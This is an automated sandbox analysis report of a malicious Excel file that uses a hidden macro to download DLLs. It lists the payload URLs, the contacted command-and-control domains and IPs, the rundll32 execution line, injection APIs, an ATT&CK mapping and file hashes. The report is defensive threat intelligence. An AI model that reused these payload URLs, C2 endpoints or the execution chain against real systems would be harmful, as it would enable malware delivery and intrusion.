    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ywmiu\egwih.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 2840Thread sleep time: -300000s >= -30000s
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0090A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0084D830 LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00852EF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00920D28 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00920C5E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00920865 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000A2EF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0090A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0090ABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Contains functionality to inject code into remote processesShow sources
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0084AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: case (166).xls, type: SAMPLE
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: msiexec.exe, 00000005.00000002.2354558666.0000000000A80000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: msiexec.exe, 00000005.00000002.2354558666.0000000000A80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: msiexec.exe, 00000005.00000002.2354558666.0000000000A80000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0090968A cpuid
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_009095A6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00841A00 CreateDialogParamW,GetVersion,
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting4Path InterceptionAccess Token Manipulation1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting4Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery35Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing2/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    case (166).xls23%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    5.2.msiexec.exe.90000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
    4.2.rundll32.exe.840000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File

    Domains

    SourceDetectionScannerLabelLink
    gadgetswolf.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)0%Avira URL Cloudsafe
    http://crl3.digicert0%Avira URL Cloudsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    https://rnollg.com/kev/scfrd.dll0%Avira URL Cloudsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    https://homesoapmolds.com/post.phpv0%Avira URL Cloudsafe
    https://gadgetswolf.com/post.php0%Avira URL Cloudsafe
    https://govemedico.tk/0%Avira URL Cloudsafe
    https://homesoapmolds.com/post.php0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://gadgetswolf.com/post.phpx0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    https://gadgetswolf.com/A0%Avira URL Cloudsafe
    https://gadgetswolf.com/post.phpr0%Avira URL Cloudsafe
    https://gadgetswolf.com/y0%Avira URL Cloudsafe
    https://homesoapmolds.com/=0%Avira URL Cloudsafe
    https://govemedico.tk/O0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~0%Avira URL Cloudsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    https://rnollg.com/kev/scfrd.dll$80%Avira URL Cloudsafe
    https://homesoapmolds.com/0%Avira URL Cloudsafe
    https://govemedico.tk/post.php0%Avira URL Cloudsafe
    Https://homesoapmolds.com/post.phpZ0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    homesoapmolds.com
    172.67.198.109
    truefalse
      unknown
      rnollg.com
      172.67.150.228
      truefalse
        unknown
        gadgetswolf.com
        104.21.44.135
        truefalseunknown
        govemedico.tk
        172.67.158.184
        truefalse
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)A1EE0000.0.drfalse
          • Avira URL Cloud: safe
          unknown
          http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.comrundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpfalse
              high
              http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpfalse
                high
                http://crl.entrust.net/server1.crl0msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                  high
                  http://crl3.digicertmsiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.entrust.net03msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://rnollg.com/kev/scfrd.dllbefore.1.0.0.sheet.csv_unpacktrue
                  • Avira URL Cloud: safe
                  unknown
                  http://www.diginotar.nl/cps/pkioverheid0msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://homesoapmolds.com/post.phpvmsiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://gadgetswolf.com/post.phpmsiexec.exe, 00000005.00000003.2165360506.000000000047D000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://govemedico.tk/msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://homesoapmolds.com/post.phpmsiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpfalse
                    high
                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmpfalse
                      high
                      https://gadgetswolf.com/post.phpxmsiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://gadgetswolf.com/Amsiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.msiexec.exe, 00000005.00000002.2354613249.0000000001F80000.00000002.00000001.sdmpfalse
                        high
                        https://gadgetswolf.com/post.phprmsiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://gadgetswolf.com/ymsiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://homesoapmolds.com/=msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://investor.msn.com/rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpfalse
                          high
                          https://govemedico.tk/Omsiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.%s.comPAmsiexec.exe, 00000005.00000002.2354613249.0000000001F80000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          low
                          http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~case (166).xlsfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ocsp.entrust.net0Dmsiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://rnollg.com/kev/scfrd.dll$8case (166).xls, A1EE0000.0.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://secure.comodo.com/CPS0msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                            high
                            https://homesoapmolds.com/msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.entrust.net/2048ca.crl0msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                              high
                              https://govemedico.tk/post.phpmsiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              Https://homesoapmolds.com/post.phpZmsiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              172.67.158.184
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              172.67.150.228
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              104.21.44.135
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              172.67.198.109
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse

                              General Information

                              Joe Sandbox Version:31.0.0 Emerald
                              Analysis ID:344660
                              Start date:26.01.2021
                              Start time:21:24:23
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 6m 3s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:case (166).xls
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.expl.evad.winXLS@7/12@4/4
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 67.8% (good quality ratio 67.5%)
                              • Quality average: 89.5%
                              • Quality standard deviation: 19.2%
                              HCA Information:
                              • Successful, ratio: 84%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xls
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • TCP Packets have been reduced to 100
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              21:25:13API Interceptor1195x Sleep call for process: msiexec.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              CLOUDFLARENETUSPAYMENT.xlsxGet hashmaliciousBrowse
                              • 104.16.19.94
                              PAYMENT.xlsxGet hashmaliciousBrowse
                              • 104.16.18.94
                              Informacion.docGet hashmaliciousBrowse
                              • 104.21.89.78
                              PAYMENT.260121.xlsxGet hashmaliciousBrowse
                              • 162.159.133.233
                              SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              Ewqm21Iwdh.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              a4iz7zkilq.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              case (547).xlsGet hashmaliciousBrowse
                              • 104.21.23.220
                              Vcg9GH4CWw.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              case (547).xlsGet hashmaliciousBrowse
                              • 104.21.23.220
                              nMn5eAMhBy.exeGet hashmaliciousBrowse
                              • 172.67.188.154
                              sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              vK6VPijMoq.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              8gom3VEZLS.exeGet hashmaliciousBrowse
                              • 172.67.188.154
                              y4Gpxq7eWg.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              v07PSzmSp9.exeGet hashmaliciousBrowse
                              • 66.235.200.145
                              COA for PI#Sc09283,PDF.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              IMG_761213.docGet hashmaliciousBrowse
                              • 172.67.188.154
                              The Mental Health Center.xlsxGet hashmaliciousBrowse
                              • 104.16.19.94
                              CLOUDFLARENETUSPAYMENT.xlsxGet hashmaliciousBrowse
                              • 104.16.19.94
                              PAYMENT.xlsxGet hashmaliciousBrowse
                              • 104.16.18.94
                              Informacion.docGet hashmaliciousBrowse
                              • 104.21.89.78
                              PAYMENT.260121.xlsxGet hashmaliciousBrowse
                              • 162.159.133.233
                              SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              Ewqm21Iwdh.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              a4iz7zkilq.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              case (547).xlsGet hashmaliciousBrowse
                              • 104.21.23.220
                              Vcg9GH4CWw.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              case (547).xlsGet hashmaliciousBrowse
                              • 104.21.23.220
                              nMn5eAMhBy.exeGet hashmaliciousBrowse
                              • 172.67.188.154
                              sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              vK6VPijMoq.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              8gom3VEZLS.exeGet hashmaliciousBrowse
                              • 172.67.188.154
                              y4Gpxq7eWg.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              v07PSzmSp9.exeGet hashmaliciousBrowse
                              • 66.235.200.145
                              COA for PI#Sc09283,PDF.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              IMG_761213.docGet hashmaliciousBrowse
                              • 172.67.188.154
                              The Mental Health Center.xlsxGet hashmaliciousBrowse
                              • 104.16.19.94
                              CLOUDFLARENETUSPAYMENT.xlsxGet hashmaliciousBrowse
                              • 104.16.19.94
                              PAYMENT.xlsxGet hashmaliciousBrowse
                              • 104.16.18.94
                              Informacion.docGet hashmaliciousBrowse
                              • 104.21.89.78
                              PAYMENT.260121.xlsxGet hashmaliciousBrowse
                              • 162.159.133.233
                              SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              Ewqm21Iwdh.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              a4iz7zkilq.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              case (547).xlsGet hashmaliciousBrowse
                              • 104.21.23.220
                              Vcg9GH4CWw.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              case (547).xlsGet hashmaliciousBrowse
                              • 104.21.23.220
                              nMn5eAMhBy.exeGet hashmaliciousBrowse
                              • 172.67.188.154
                              sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              vK6VPijMoq.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              8gom3VEZLS.exeGet hashmaliciousBrowse
                              • 172.67.188.154
                              y4Gpxq7eWg.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              v07PSzmSp9.exeGet hashmaliciousBrowse
                              • 66.235.200.145
                              COA for PI#Sc09283,PDF.exeGet hashmaliciousBrowse
                              • 104.21.19.200
                              IMG_761213.docGet hashmaliciousBrowse
                              • 172.67.188.154
                              The Mental Health Center.xlsxGet hashmaliciousBrowse
                              • 104.16.19.94

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              7dcce5b76c8b17472d024758970a406bPAYMENT.xlsxGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case (547).xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              The Mental Health Center.xlsxGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              SC-TR1167700000.xlsxGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              PAYMENT INFO.xlsxGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case (348).xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              RefTreeAnalyserXL.xlamGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case (426).xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case (250).xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case (1447).xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case (850).xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              SecuriteInfo.com.Heur.18472.xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case (1543).xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case_1581.xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case (435).xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              INV-LASKUPDF2021.xlsxGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case (426).xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109
                              case (61).xlsGet hashmaliciousBrowse
                              • 172.67.158.184
                              • 172.67.150.228
                              • 104.21.44.135
                              • 172.67.198.109

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\formnet.dll
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):933888
                              Entropy (8bit):6.687983171155114
                              Encrypted:false
                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                              MD5:B0F3FA047F6AE39A145FD364F693638E
                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
